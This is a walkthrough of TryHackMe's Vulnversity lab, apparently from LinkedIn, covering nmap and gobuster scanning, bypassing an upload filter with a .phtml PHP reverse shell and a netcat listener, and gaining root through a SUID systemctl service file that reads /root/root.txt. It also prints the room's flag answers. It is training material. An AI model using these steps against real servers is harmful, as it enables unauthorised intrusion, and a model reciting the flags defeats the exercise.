Vulnversity — Walkthrough Tryhackme

Vulnversity — Walkthrough Tryhackme



Introduction

"Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing methodologies and tools. It includes tasks such as scanning, enumeration, exploitation, and post-exploitation techniques.

Task 1: Deploy the Machine


  • Deploy the virtual machine provided in the room and note the IP address assigned


Task 2: Reconnaissance


Use 'Nmap ' to scan the target machine. Run a basic scan.

nmap -sC -sV         

We can see that ports 21, 22, 139, 445, 3128 and 3333 are open.

It is visible that the OS is Ubuntu, on which the WebServer(port 3333) is running.


Scan the box, how many ports are open?

Ans. 6

What version of the squid proxy is running on the machine?

Ans. 3.5.12

What is the most likely operating system this machine is running?

Ans. Ubuntu

What port is the web server running on?

Ans.3333

It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).

Ans. No answer needed

What is the flag for enabling verbose mode using Nmap?

Ans. -v

Task 3: Locating directories using Gobuster:

Gobuster is a tool used in penetration testing to search for hidden directories and files on web servers.

Also to used to brute-force URIs (directories and files), DNS subdomains, and virtual host names.

Gobuster flags include:

  • -u or --url: specifies the target URL to be scanned.
  • -w or --wordlist: specifies the path to the wordlist file to be used for brute-forcing directories and files.
  • -s or --wildcard: enables or disables the use of wildcard responses.
  • -e or --extensions: specifies the file extensions to search for in addition to common directory names.
  • -x or --exclude-extensions: specifies the file extensions to exclude from the search.
  • -r or --recursive: enables recursive directory brute-forcing.
  • -k or --insecure: allows connections to SSL sites without verifying the certificate.
  • -t or --threads: specifies the number of threads to use for the scan.
  • -o or --output: specifies the output file to write the scan results to.
  • -h or --help: displays the help menu.

To get started, you will need a wordlist for Gobuster (which will be used to quickly go through the wordlist to identify if a public directory is available. If you are using Kali Linux, you can find many wordlists under /usr/share/wordlists. You can also use the wordlist for directories located at /usr/share/wordlists/dirbuster/directory-list-1.0.txt in the AttackBox.

gobuster dir -u https://10.10.25.81:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
        

We discover an /internal directory and further investigation reveals an /internal/uploads directory.

What is the directory that has an upload form page?

Ans. /internal/

Task 4: Compromise the webserver

We try to upload a php reverse shell script but the extension is being filtered.

We start Burp Suite and enable it in FoxyProxy. Then, create a file with different PHP extensions for the Sniper attack.

We capture the upload request and then send it to Intruder.

We load our payload as a straightforward list.

We initiate our attack and obtain the results. Interestingly, every extension returns a Status 200, but the length of the .phtml extension differs from the others.

I uploaded a reverse PHP shell from PentestMonkey and accessed it at "/internal/uploads/rev-shell.phtml". I also configured a Netcat listener on TCP port 1234. Then, I modified the file extension to ".phtml".

We start a netcat listener: then visit Upload your shell and navigate to?https://10.10.25.81:3333/internal/uploads/php-reverse-shell.phtml - This will execute your payload.

nc -lvnp 1234        

What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.

Ans. .php

I understand the Burpsuite tool and its purpose during pentesting.

Ans. No answer needed

What extension is allowed after running the above exercise?

Ans. .phtml

While completing the above exercise, I have successfully downloaded the PHP reverse shell.

Ans. No answer needed

What is the name of the user who manages the webserver?

Ans. bill

cd /home 
ls
bash -i
cd bill
ls
cat user.txt
        

What is the user flag?

Ans. 8bd7992fbe8a6ad22a63361004cfcedb

Task 5: Privilege Escalation:

With the reverse shell in place, you need to escalate your privileges to gain full control of the machine. Check for any sudo privileges or SUID binaries that might be exploitable:

find / -perm -u=s -type f 2>/dev/null        


We notice that /bin/systemctl is a SUID binary, which we can leverage to obtain elevated privileges. Let's refer to GTFOBins and search for systemctl.

Reference: [https://gtfobins.github.io/gtfobins/systemctl/]

We create a temporary service and then use that to view root.txt file

TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF        
cd /tmp
cat output        

On the system, search for all SUID files. Which file stands out?

Ans. /bin/systemctl

What is the root flag value?

Ans. a58ff8579f0a9270368d33a9966c7fd5

Thank you very much for reading. I hope this is helpful to you. If you have any suggestions or something to add, feel free to contact me anytime.


Happy Hacking!

Santosh Kumar

Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researchers || TryHacMe Top 1% ||Programing C,Python || Bug Bounty ||

8 个月

Useful tips

回复

要查看或添加评论,请登录

Vrijanandan Kumar的更多文章

  • Red - TryHackMe Walkthrough

    Red - TryHackMe Walkthrough

    https://tryhackme.com/room/redisl33t Initial Information Gathering We begin our reconnaissance phase with a Nmap scan.

  • Library Tryhackme

    Library Tryhackme

    Start the VPN you have downloaded and deploy the TryHackMe machine first. Then, ping and check the machine's…

    1 条评论
  • Seppuku | OffSec Writeup

    Seppuku | OffSec Writeup

    Network scanning We used Nmap for port scanning. We used Nmap for port enumeration and discovered the following open…

    1 条评论
  • TryHackMe: Mr. Robot CTF

    TryHackMe: Mr. Robot CTF

    Difficulty: Medium Room URL: https://tryhackme.com/room/mrrobot Scanning It was known that port 80, 443 and 22 were…

  • Tryhackme-GmingServer Walkthrough

    Tryhackme-GmingServer Walkthrough

    Network Enumeration I started the network enumeration by running a port scan using rustscan looking for open ports and…

  • Lazy Admin TryhackMe

    Lazy Admin TryhackMe

    Easy Linux machine to practice your skills Enumeration I started a Rustscan scan and found both an SSH service and a…

  • SQLMAP -TryhackMe Writeup

    SQLMAP -TryhackMe Writeup

    Task 1: Introduction What is Sqlmap ? Sqlmap is an open-source penetration testing tool designed to automate the…

    1 条评论
  • Katana Walkthrough (offsec_lab)

    Katana Walkthrough (offsec_lab)

    https://portal.offsec.

  • MoneyBox (Vulnhub WalkThrough)

    MoneyBox (Vulnhub WalkThrough)

    MoneyBox (Vulnhub WalkThrough) Today I’m going to solve challenge MoneyBox Vulnhub WalkThrough. Offensive Security Edit…

  • Gaara Vulnhub(walkthrough)

    Gaara Vulnhub(walkthrough)

    Gaara Vulnhub(walkthrough) 01.) Target Discovery with Nmap 02.

社区洞察

其他会员也浏览了